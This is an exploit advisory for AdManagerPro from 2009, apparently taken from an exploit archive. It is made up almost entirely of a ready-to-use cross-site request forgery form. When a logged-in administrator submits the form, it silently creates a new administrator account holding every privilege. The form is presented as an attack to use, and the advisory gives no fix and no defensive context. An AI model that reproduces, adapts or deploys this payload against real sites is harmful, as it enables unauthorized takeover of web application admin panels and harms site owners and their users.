AdManagerPro CSRF Create Administrator Account :

Date : 2009-12-14 Author : bi0
                ______     __     ______
               /  ==    /    /  __ 
                  __<         / 
                 \_____   \_   \_____
                 /_____/   /_/   /_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] AdManagerPro - [ CSRF ] Create Administrator Account
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: [email protected]
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<form action="http://[server]/[path]/administration/admins.php" method="POST">
  <input type="hidden" name="action" value="admin_created">
  <input  name="username" value="adminlol" maxlength=15>
  <input  name="password" maxlength=15 value="adminlol">
  <input  name="email" maxlength="255" value="[email protected]">
  <input  name="name" maxlength="255" value="adminlol">
<input type="hidden" name="rights[]" value="advertisers" CHECKED>
<input type="hidden" name="rights[]" value="packages" CHECKED>
<input type="hidden" name="rights[]" value="publishers" CHECKED>
<input type="hidden" name="rights[]" value="ads" CHECKED>
<input type="hidden" name="rights[]" value="def_ads" CHECKED>
<input type="hidden" name="rights[]" value="black_zones" CHECKED>
<input type="hidden" name="rights[]" value="backup" CHECKED>
<input type="hidden" name="rights[]" value="email_u" CHECKED>
<input type="hidden" name="rights[]" value="reset" CHECKED>
<input type="hidden" name="rights[]" value="tmpl_msg" CHECKED>
<input type="hidden" name="rights[]" value="admins" CHECKED>
<input type="hidden" name="rights[]" value="config" CHECKED>
<input type="submit" name="submit" value="Submit">
</form>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

C1

 

C2

 

C3